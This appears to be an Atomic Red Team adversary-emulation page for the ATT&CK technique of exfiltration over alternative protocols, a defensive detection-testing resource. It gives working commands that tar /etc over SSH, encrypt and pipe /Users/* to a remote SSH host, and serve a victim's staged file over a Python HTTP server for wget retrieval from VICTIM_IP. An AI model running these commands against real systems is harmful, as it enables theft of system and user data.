Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, or some other network protocol. Different channels could include Internet Web services such as cloud storage.
-
Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH
-
Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH
-
Atomic Test #3 - Exfiltration Over Alternative Protocol - HTTP
Input a domain and test Exfiltration over SSH
Remote to Local
Supported Platforms: macOS, CentOS, Ubuntu, Linux
| Name | Description | Type | Default Value |
|---|---|---|---|
| domain | target SSH domain | url | target.example.com |
| user_name | username for domain | string | atomic |
| password | password for user | string | atomic |
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
Input a domain and test Exfiltration over SSH
Local to Remote
Supported Platforms: macOS, CentOS, Ubuntu, Linux
| Name | Description | Type | Default Value |
|---|---|---|---|
| domain | target SSH domain | url | target.example.com |
| user_name | username for domain | string | atomic |
| password | password for user | string | atomic |
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.
Supported Platforms: macOS, CentOS, Ubuntu, Linux
-
Victim System Configuration:
mkdir /tmp/victim-staging-area echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
-
Using Python to establish a one-line HTTP server on victim system:
cd /tmp/victim-staging-area python -m SimpleHTTPServer 1337
-
To retrieve the data from an adversary system:
wget http://VICTIM_IP:1337/victim-file.txt